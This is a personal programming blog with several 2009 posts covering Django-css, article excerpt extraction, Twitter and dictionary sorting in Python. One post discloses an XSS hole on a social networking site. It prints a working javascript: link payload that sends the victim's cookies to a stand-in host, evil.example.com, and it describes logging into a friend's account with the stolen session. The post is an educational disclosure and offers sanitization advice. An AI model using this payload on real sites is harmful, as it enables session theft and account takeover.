David Ziegler's personal blog of computing, math, and other heroic achievements.


07 Jul 2009

I Found A Surprisingly Simple XSS Hack

So the other day, I was bored and told a friend of mine that I would try to hack into one of her accounts. I didn't have a particularly good reason for this; I mainly just wanted to see if I could. She suggested a prominent social networking site, which I'll call X.com.

First, a little background and a disclaimer. The only reason I'm describing this exploit is that as soon as I discovered it, I emailed the site admins, and they fixed it within a few hours. This post is intended for educational purposes and to help others make sure that their own sites are secure.

I figured I would try an XSS attack using their instant messaging system, because I knew they allowed certain tags like <a> and <i> in messages. Basically, with an XSS attack, if I'm able to inject my own javascript into your browser, the game is over and I win.

So, the first thing I tried was sending her this message:

Hey, what's up? <script>alert('test')</script>

which, unsurprisingly, was sanitized to just:

Hey, what's up?

I knew <img> tags wouldn't work, so the next thing I tried was:

Hey, what's up? Click this <a href="javascript:alert('test')">link</a>

And to my surprise, this did not get sanitized, meaning that she saw this:

Hey, what's up? Click this link

If you click that link, a harmless little alert box pops up. Why is that a big deal? Well, if I replace alert with a function that grabs her X.com cookie string and sends it to one of my servers in an ajax request, then I can log in with her account. And just to be sure, I did exactly that, and was able to sign in as her.
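For the curious, the cookie-grabbing version of the payload looks something like the message below. The URL is made up, and an image beacon is the lazy cousin of the ajax request I described:

Hey, what's up? Click this <a href="javascript:(new Image()).src='http://evil.example.com/steal?c='+encodeURIComponent(document.cookie);">link</a>

One click, and the browser helpfully ships the session cookies off to a server the attacker controls.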

So what's the moral? Well, the people at X.com are certainly not stupid, but it was a little scary to find out that the second-simplest XSS attack I could think of worked on a pretty prominent social networking site. I contacted one of the engineers about this, and according to him, the backend was sanitizing the HTML properly, but one of the designers used an unescapeHTML function to support simple styles like <b> and <i>, unknowingly creating this vulnerability. Anytime you unescape HTML, especially when it comes from users, you'd better be really, really sure you know what you're doing!
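For what it's worth, here's a rough sketch of the whitelist approach in Python with BeautifulSoup. This is illustrative, not production-grade; sanitizing HTML correctly is famously easy to get wrong, so use a vetted library if you can:

from BeautifulSoup import BeautifulSoup

ALLOWED_TAGS = ('a', 'b', 'i')

def sanitize(html):
    soup = BeautifulSoup(html)
    for tag in soup.findAll(True):
        if tag.name not in ALLOWED_TAGS:
            tag.hidden = True  # drop the tag itself but keep its inner text
        else:
            # whitelist attributes too: keep only http(s) hrefs on <a>
            href = tag.get('href', '')
            keep_href = tag.name == 'a' and href.lower().startswith(('http://', 'https://'))
            tag.attrs = [('href', href)] if keep_href else []
    return unicode(soup)

The key idea is the opposite of unescapeHTML: instead of deciding what to forbid, decide what to allow, and drop everything else, including href values that aren't plain http or https.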

Also, this reminded me that a lot of Django developers rely on Django to autoescape their templates. During ajax requests, though, if you're just passing a dictionary of variables back as JSON, make sure any strings you're passing back get escaped! Unless the strings came through render_to_string or something similar, they're probably not autoescaped, so just be aware.
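A minimal sketch of what I mean; the view and field names here are made up:

from django.http import HttpResponse
from django.utils import simplejson
from django.utils.html import escape

def comment_preview(request):
    # autoescaping only happens in templates, so escape by hand here
    text = request.POST.get('text', '')
    data = {'preview': escape(text)}
    return HttpResponse(simplejson.dumps(data), mimetype='application/json')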


06 Jul 2009

Django-css Version 2 is out

I just released version 2 of Django-css, and it’s on github now.

http://github.com/dziegler/django-css/tree/master

This is a significant departure from version 1 because it uses django_compressor rather than django-compress to do compression and versioning. As a result, it's much easier to use and set up.

Usage is virtually identical to django_compressor, except you can also include HSS, Sass, CleverCSS, etc. files in addition to plain CSS. For example:

{% compress css xhtml %}
<link rel="stylesheet" href="{{MEDIA_URL}}css/reset.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="{{MEDIA_URL}}css/base.ccss" type="text/css" charset="utf-8" />
{% endcompress %}

will render something like:

<link rel="stylesheet" href="/static/CACHE/css/f7c661b7a124.css"
    type="text/css" media="all" charset="utf-8" />

(Be sure to use the xhtml argument if you're using xhtml, otherwise <link> won't self-close.) The only additional piece of work you need is something like this in your settings file:
COMPILER_FORMATS = {
    '.sass': {
        'binary_path': 'sass',
        'arguments': '*.sass *.css'
    },
    '.hss': {
        'binary_path': '/home/dziegler/hss',
        'arguments': '*.hss'
    },
    '.ccss': {
        'binary_path': 'clevercss',
        'arguments': '*.ccss'
    },
}

to tell django-css where to find your css compiler binaries and how to pass them arguments.
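Javascript goes through the same compress tag, courtesy of django_compressor (django-css doesn't touch that part); a quick sketch:

{% compress js %}
<script src="{{MEDIA_URL}}js/base.js" type="text/javascript" charset="utf-8"></script>
{% endcompress %}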

If you’re not familiar with django_compressor, it’s basically a more elegant django-compress. From the django_compressor readme:

JS/CSS belong in the templates
Every static combiner for django I’ve seen makes you configure your static files in your settings.py. While that works, it doesn’t make sense. Static files are for display. And it’s not even an option if your settings are in completely different repositories and use different deploy processes from the templates that depend on them.
Flexibility
django_compressor doesn’t care if different pages use different combinations of statics. It doesn’t care if you use inline scripts or styles. It doesn’t get in the way.
Automatic regeneration and cache-foreverable generated output
Statics are never stale and browsers can be told to cache the output forever.

So now you include your css/js in templates, where they belong. Also, with django-compress you have to play around with a bunch of settings variables that not even I totally understand to get your versioning to work correctly. With django_compressor, if you want to update your compressed and versioned css/js, you just flush the cache. During development you're probably using

CACHE_BACKEND = 'dummy:///'

so it should automatically be updated.

Here is my nightmarish settings configuration with django-css version 1:

# django_css
COMPILER_FORMATS = {
    '.ccss': {
        'binary_path': 'clevercss',
        'arguments': 'SOURCE_FILENAME.ccss'
    }
}
COMPRESS_YUI_BINARY = os.path.join('java -jar '+PROJECT_PATH,'yuicompressor-2.4.2.jar')
COMPRESS=False
COMPRESS_CSS = {
    'css': {
        'source_filenames': ('css/reset.css','css/base.ccss','css/thickbox.css',
                             'css/uni-form-generic.css','css/uni-form.css',
                             'css/jquery-ui-1.7.2.custom.css',
                             'css/jquery.rating.css'),
        'output_filename': 'css/all_compressed.r?.css'
    },
    'iefix_css': {
        'source_filenames': ('css/iefix.ccss',),
        'output_filename': 'css/iefix_compressed.r?.css'
    }
}
COMPRESS_JS = {
    'js': {
        'source_filenames': ('js/json2.js','js/jquery.corners.min.js',
                             'js/jquery.form.js','js/thickbox.js','js/uni-form.jquery.js',
                             'js/jquery.MetaData.js','js/jquery.rating.js',
                             'js/jquery-ui-1.7.2.custom.min.js',
                             'js/base.js'),
        'output_filename': 'js/all_compressed.r?.js'
    }
}
COMPRESS_AUTO = True
COMPRESS_VERSION = True 
COMPRESS_CSS_FILTERS = ('django_css.filters.yui.YUICompressorFilter',)
COMPRESS_JS_FILTERS = ('django_css.filters.yui.YUICompressorFilter',)

and with django-css version 2:

# django_css
COMPILER_FORMATS = {
    '.ccss': {
        'binary_path': 'clevercss',
        'arguments': '*.ccss'
    },
}
COMPRESS_YUI_BINARY = os.path.join('java -jar '+PROJECT_PATH,'yuicompressor-2.4.2.jar')
COMPRESS_CSS_FILTERS = ('compressor.filters.yui.YUICSSFilter',)
COMPRESS_JS_FILTERS = ('compressor.filters.yui.YUIJSFilter',)

So, I think this is a pretty big improvement. As always, feel free to send me any suggestions, comments, or questions. Plus, now that it’s on github you can fork or push changes.


11 Jun 2009

A Python Script to Automatically Extract Excerpts From Articles

I recently had to write a script that takes a link to an article and returns a title and brief excerpt or description of that article. Ideally, the excerpt should be the first few sentences from the body of the article.

The first thing I struggled with was something I thought would be trivial: fetching the contents of the webpage.

>>> import httplib2
>>> http = httplib2.Http()
>>> response, content = http.request("http://www.mercurynews.com/karendsouza/ci_12510394")
>>> content
''
>>> response['status']
'200'

Ugh. Why is the content empty when the status code is 200? Well, for some reason, even though we're not logging in, this page requires that you accept a cookie and then redirects you, but it doesn't send a proper 302 redirect that httplib2 knows to follow. So the simplest solution was to ditch httplib2 and use urllib2 and cookielib (by the way, what's with having urllib, urllib2, httplib, and httplib2?).

>>> import urllib2
>>> import cookielib
>>> url = "http://www.mercurynews.com/karendsouza/ci_12510394"
>>> cj = cookielib.CookieJar()
>>> opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
>>> doc = opener.open(url).read()

Once we have the contents of the page, we load everything into BeautifulSoup and make sure that we have some valid HTML. cleanSoup is just a helper function to filter out HTML that I'm not interested in or that could munge up my results.

from BeautifulSoup import BeautifulSoup, SoupStrainer, Comment
import re

def cleanSoup(soup):
    # get rid of javascript, noscript and css
    [[tree.extract() for tree in soup(elem)] for elem in ('script', 'noscript', 'style')]
    # get rid of doctype
    subtree = soup.findAll(text=re.compile("DOCTYPE"))
    [tree.extract() for tree in subtree]
    # get rid of comments
    comments = soup.findAll(text=lambda text: isinstance(text, Comment))
    [comment.extract() for comment in comments]
    return soup

soup = cleanSoup(BeautifulSoup(doc, parseOnlyThese=SoupStrainer('head')))

# (this and the snippet below live inside one extraction function,
# hence the returns -- see the sketch further down)
if not soup.get_starttag_text():
    print "Invalid input"
    return None

try:
    title = soup.head.title.string
except AttributeError:
    title = None

description = ''
for meta in soup.findAll('meta'):
    if 'description' == meta.get('name', '').lower():
        description = meta['content']
        break

Getting the title is easy, and it seems to be a pretty safe assumption that every page has a title defined in head. Sometimes you'll get lucky and a description will exist in a meta tag, and bam, you're done. More often than not, though, you'll have to come up with a method to parse the HTML and figure out which part of it is the article you're interested in. I tried a couple of different approaches, and the one below seemed to produce the best results for its relative simplicity. I considered some natural language parsing and machine learning methods, but I really don't have time to build something that complicated for this project.

def removeHeaders(soup):
    # strip h1-h6; they usually hold the title/author/date, not body text
    [[tree.extract() for tree in soup(elem)] for elem in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6')]
    return soup

if not description:
    soup = removeHeaders(cleanSoup(BeautifulSoup(doc, parseOnlyThese=SoupStrainer('body'))))
    text = ''.join(soup.findAll(text=True)).split('\n')
    description = max((len(i.strip()), i) for i in text)[1].strip()[0:255]
return (title, description)

First I parse out all the text from <body> and remove h1, h2, etc. headers, because they're likely to contain information like the title, author, and date that isn't part of the body of the article. Thankfully, BeautifulSoup does most of the heavy lifting here. I then try to merge adjacent paragraphs into one long string of text. You have to be careful when joining bodies of text together, because if you branch too far out, you end up merging in junk text. The first 255 characters of the longest resulting string are returned as the article excerpt. In most cases I found that this does a pretty good job of finding the first couple of sentences of the article, or at least a reasonable excerpt.
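For reference, here's roughly how the fragments above hang together as one function (get_summary is just what I'm calling it here; the real script is in the github repo linked in the update below):

def get_summary(url):
    # fetch the page, accepting cookies along the way
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    doc = opener.open(url).read()

    # title and meta description come from <head>
    soup = cleanSoup(BeautifulSoup(doc, parseOnlyThese=SoupStrainer('head')))
    if not soup.get_starttag_text():
        return None
    try:
        title = soup.head.title.string
    except AttributeError:
        title = None
    description = ''
    for meta in soup.findAll('meta'):
        if meta.get('name', '').lower() == 'description':
            description = meta['content']
            break

    # otherwise, fall back to the longest run of text in <body>
    if not description:
        soup = removeHeaders(cleanSoup(BeautifulSoup(doc, parseOnlyThese=SoupStrainer('body'))))
        text = ''.join(soup.findAll(text=True)).split('\n')
        description = max((len(i.strip()), i) for i in text)[1].strip()[0:255]
    return (title, description)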

Some examples are shown below. Facebook has a widget that does this too, so I included the output of Facebook’s widget as a comparison. If you have any ideas on how to improve this, I’d love to hear them.

http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2009/06/04/DD7V1806SV.DTL&type=performance

Me:

The blood-and-thunder tale of two idealistic but naive artists caught up in the repressive political machinery of Rome during the Napoleonic wars, “Tosca” comes around like clockwork in San Francisco (as it does to most opera companies). It always thrills

Facebook:

Puccini’s “Tosca” includes a number of surefire arias, and you can hear them sung vividly and well in the San Francisco Opera’s revival, which opened the company’s summer season at the War Memorial Opera House on Tuesday night.


http://www.chloeveltman.com/blog/2009/05/two-very-different-symphonies.html

Me:

The diversity of the Bay Area can be witnessed in many different ways, from the variety of the cuisine offered in its restaurants to the multitudinous kinds of topography. One less obvious way to explore the radical differences that coexist in this part o

Facebook:

Facebook actually doesn’t return a description for this page.


http://blogs.mercurynews.com/aei/2009/06/04/ramya-auroprem-joins-cast-of-spelling-bee/

Me:

How do you spell L-O-C-A-L P-R-I-D-E? Ramya Auroprem, of 2009 Scripps Spelling Bee fame, will get another shot in the spotlight on June 6. The San Jose schoolgirl will join the cast of San Jose Repertory Theatre’s “The 25th Annual Spelling Bee”

Facebook:

How do you spell L-O-C-A-L P-R-I-D-E? Ramya Auroprem, of 2009 Scripps Spelling Bee fame, will get another shot in the spotlight on June 6. The San Jose schoolgirl will join the cast of San Jose Repertory Theatre’s “The 25th Annual Spelling Bee” for the 3 p.m. performance. You go girl!


http://www.reason.com/news/show/134059.html

Me:

President Obama and his critics have a major disagreement. He says his accelerated economic stimulus efforts will create 600,000 jobs by the end of the summer. Senate Republican Leader Mitch McConnell of Kentucky, however, doubts “the spending binge

Facebook:

President Obama and his critics have a major disagreement. He says his accelerated economic stimulus efforts will create 600,000 jobs by the end of the summer. Senate Republican Leader Mitch McConnell

Update: Now on github http://github.com/dziegler/excerpt_extractor/tree/master
Thanks for the DRY suggestions to make the code prettier.


16 May 2009

I’m 25 Today

Until a man is twenty-five, he still thinks, every so often, that under the right circumstances he could be the baddest motherfucker in the world. If I moved to a martial-arts monastery in China and studied real hard for ten years. If my family was wiped out by Colombian drug dealers and I swore myself to revenge. If I got a fatal disease, had one year to live, devoted it to wiping out street crime. If I just dropped out and devoted my life to being bad.

— Neal Stephenson (Snow Crash)

Sorry, but I still believe this is true.


13 May 2009

See Which Twitterers Don’t Follow You Back In Less Than 14 Lines of Python

UPDATED (1/8/10): See Which Twitterers Don’t Follow You Back (updated)

All right, so I totally stole this from See Which Twitterers Don’t Follow You Back In Less Than 15 Lines of Ruby. Basically, if you have some bizarre desire to see who doesn’t reciprocate your follows on Twitter, or you just like to feel unpopular, I have the script for you.

I have no idea what practical application this might have, but I’m going to be using Twitter for a development project and I thought this would be a nice way to get my feet wet with the API. Also, everyone loves a good Python vs Ruby shootout :)

There are a couple of Twitter API clients written in Python, but python-twitter seems to be the most popular. To install, just do

$ easy_install python-twitter

or check out the subversion repository if you want the latest source. To be honest, I was a little disappointed that it lacked some basic features, like having the friend and follower counts be attributes of a Twitter user object. If the Rubyists can have them with the Twitter gem, why can't we? Anyway, here's the code:

import twitter, sys, getpass

def call_api(username, password):
    api = twitter.Api(username, password)
    friends = api.GetFriends()
    followers = api.GetFollowers()
    heathens = filter(lambda x: x not in followers, friends)
    print "There are %i people you follow who do not follow you:" % len(heathens)
    for heathen in heathens:
        print heathen.screen_name

if __name__ == "__main__":
    password = getpass.getpass()
    call_api(sys.argv[1], password)

You can see that I added some convenience functions so you can run this script from the command line. If you took these out you could get it down to 8 lines, but whatever. I’m not a big fan of leaving my passwords lying around in plain text files, so I use the getpass module to hide my password as I type it into the command line. To run the script, just do

$ python twit_heathens.py <twitter-username>

Running the program looks like this:

$ python twit_heathens.py david_ziegler
Password: 
There are 9 people you follow who do not follow you:
leahculver
boxee
boxee_bd
jeresig
sunlightlabs
venturehacks
djangolinks
lushwhip
thefo0

And bam, you can see all the people who are too cool to follow you on Twitter. If you want, you can download the script here: http://filer.case.edu/~dez4/twit_heathens.py
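One aside: the filter/lambda line does a linear membership test against the followers list for every friend, which is O(n*m). If you follow a lot of people, comparing screen names through a set is snappier; a sketch of the change:

# build a set of follower screen names for fast membership tests
follower_names = set(u.screen_name for u in followers)
heathens = [u for u in friends if u.screen_name not in follower_names]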


13 May 2009

Sorting a List of Dictionaries in Python

Sorting a list of dictionaries by the value of some particular key is something that comes up pretty frequently for me. So if we have

[{'name': 'Bert', 'age': 24}, {'name': 'Adam', 'age': 27}, {'name': 'Claire', 'age': 25}]

and we wanted to sort by age, we would get

[{'name': 'Bert', 'age': 24}, {'name': 'Claire', 'age': 25}, {'name': 'Adam', 'age': 27}]

Lots of people ask this question, and there are a ton of different solutions out there. I had some free time, so I decided to test them out.

Setup

from random import random
d = [dict([(j, random()) for j in xrange(10)]) for i in xrange(500000)]

This generates an unsorted list of 500000 dictionaries, with each dictionary having 10 key/value pairs. The value for each key is drawn from a uniform distribution.

Python has two built-in ways to sort lists. If you don't need the original list, use list.sort(), since it's slightly more efficient. If you want to keep the original list, use sorted(list). I ran the following experiments using both.
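The timings below come from something along the lines of this harness (the actual script I used is linked at the bottom):

import time

KEY = 0  # sort on one of the ten keys

def time_sort(sort_fn):
    data = list(d)  # shallow copy, so d itself stays unsorted
    start = time.time()
    sort_fn(data)
    return time.time() - start

print "%.6f seconds" % time_sort(lambda data: data.sort(key=lambda k: k[KEY]))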

Method 1

def compare_by(fieldname):
    def compare_two_dicts(a, b):
        return cmp(a[fieldname], b[fieldname])
    return compare_two_dicts

d.sort(compare_by(KEY))
>>> 8.720021 seconds

d = sorted(d, compare_by(KEY))
>>> 9.655032 seconds

I found this method here, and in terms of both performance and elegance it comes up as the worst of the ones I surveyed.

Method 2

d.sort(lambda x, y: cmp(x[KEY], y[KEY]))
>>> 8.667607 seconds

d = sorted(d, lambda x, y: cmp(x[KEY], y[KEY]))
>>> 9.260699 seconds

This is a little more efficient because it removes some unnecessary function calls, but we can do much better.

Method 3

d.sort(key=lambda k: k[KEY])
>>> 1.803021 seconds

d = sorted(d, key=lambda k: k[KEY])
>>> 1.810326 seconds

This uses the key parameter that was added to the sort functions in Python 2.4, which kind of excuses the previous methods, since I believe they were written prior to 2.4. The speedup makes sense: the key function is called just once per element, while a cmp function gets called on every one of the O(n log n) comparisons.

Method 4

from operator import itemgetter
d.sort(key=itemgetter(KEY))
>>> 1.673376 seconds

d = sorted(d, key=itemgetter(KEY))
>>> 1.656095 seconds

Using itemgetter is faster than the lambda because it's written in C, but I personally find the lambda method a little easier to grok. If speed is your thing, though, use itemgetter.
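As a bonus, itemgetter accepts multiple keys, which gets you tie-breaking for free. For example, to sort by age and break ties by name:

from operator import itemgetter

people = [{'name': 'Bert', 'age': 24}, {'name': 'Adam', 'age': 24},
          {'name': 'Claire', 'age': 25}]
people.sort(key=itemgetter('age', 'name'))  # Adam, Bert, Claire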

You can find the code I used to run these experiments here: http://filer.case.edu/~dez4/sort.py


28 Apr 2009

Gray Hat Python

Just ordered my copy of Gray Hat Python from Amazon last night. Here’s the full description of the book:

Gray Hat Python: Python Programming for Hackers and Reverse Engineers

Python is fast becoming the programming language of choice for hackers, reverse engineers, and software testers because it’s easy to write quickly, and it has the low-level support and libraries that make hackers happy. But until now, there has been no real manual on how to use Python for a variety of hacking tasks. You had to dig through forum posts and man pages, endlessly tweaking your own code to get everything working. Not anymore.

Gray Hat Python explains the concepts behind hacking tools and techniques like debuggers, trojans, fuzzers, and emulators. But author Justin Seitz goes beyond theory, showing you how to harness existing Python-based security tools - and how to build your own when the pre-built ones won’t cut it.

You’ll learn how to:

  • Automate tedious reversing and security tasks
  • Design and program your own debugger
  • Learn how to fuzz Windows drivers and create powerful fuzzers from scratch
  • Have fun with code and library injection, soft and hard hooking techniques, and other software trickery
  • Sniff secure traffic out of an encrypted web browser session
  • Use PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU, and more

The world’s best hackers are using Python to do their handiwork. Shouldn’t you?

It looks pretty cool, although I think javascript is really the language of choice these days, since XSS exploits are so easy to find. But hey, I love python, and I could always use a brush-up on secure computing. Anyways, I'll post a review once I've gotten a chance to look through it.


27 Apr 2009

Solution to the XKCD “Substitute” velociraptor problem

So, my friend Huaizhi Chen is a huge nerd and one of the smartest guys I know. Because he is simultaneously lame and cool, he spent his Friday night solving Problem #2 in the following XKCD comic:

[xkcd comic: "Substitute"]

I saw this solution: http://www.mbeckler.org/velociraptors/velociraptors.html but it relies on genetic programming/evolutionary algorithms, which are slower and don't necessarily guarantee an optimal solution. Huaizhi instead uses a numeric differential equation solver to get approximately the same answer, which I find much more elegant, and we know it's optimal.

He kindly wrote up his solution and posted it here: http://sites.google.com/site/chnhzh/Home/velociraptor.pdf (check it out). The final solution turns out to be 32.6 and 147.4 degrees north of the horizon. Pretty cool!
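If you want to poke at the problem yourself without a real ODE solver, here's a crude brute-force Euler-integration sketch. The numbers are my recollection of the comic's setup, so treat them as assumptions: you run at 6 m/s from the center of an equilateral triangle 20 m on a side, the injured raptor at the top vertex tops out at 10 m/s, and the other two run 25 m/s. It only considers straight-line escape routes:

import math

HUMAN_SPEED = 6.0
RAPTOR_SPEEDS = (10.0, 25.0, 25.0)  # injured raptor first, at the top vertex
DT = 0.001                          # timestep in seconds
CAUGHT = 0.1                        # capture radius in meters

# vertices of an equilateral triangle with 20 m sides, centered on you
R = 20.0 / math.sqrt(3)             # circumradius
STARTS = [(R * math.cos(a), R * math.sin(a))
          for a in (math.pi / 2, math.pi / 2 + 2 * math.pi / 3,
                    math.pi / 2 + 4 * math.pi / 3)]

def survival_time(theta):
    """Seconds you last running in a straight line at angle theta."""
    hx = hy = 0.0
    raptors = list(STARTS)
    t = 0.0
    while True:
        hx += HUMAN_SPEED * math.cos(theta) * DT
        hy += HUMAN_SPEED * math.sin(theta) * DT
        for i, (rx, ry) in enumerate(raptors):
            dx, dy = hx - rx, hy - ry
            dist = math.hypot(dx, dy)
            if dist < CAUGHT:
                return t
            # each raptor runs straight at your current position
            raptors[i] = (rx + RAPTOR_SPEEDS[i] * dx / dist * DT,
                          ry + RAPTOR_SPEEDS[i] * dy / dist * DT)
        t += DT

best_time, best_angle = max((survival_time(math.radians(deg)), deg)
                            for deg in xrange(360))
print "run at %d degrees to survive %.2f seconds" % (best_angle, best_time)

A 1-degree grid and Euler steps are nowhere near the precision of a proper solver, but it should land in the same neighborhood as the 32.6/147.4 answer.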


20 Apr 2009

CleverCSS Fork

Since I’m using CleverCSS a lot now and it’s no longer maintained, I decided to fork it: http://github.com/dziegler/clevercss/tree/master

It contains several important bug fixes, and if I have time I'll try to add support for @ keywords like @media.

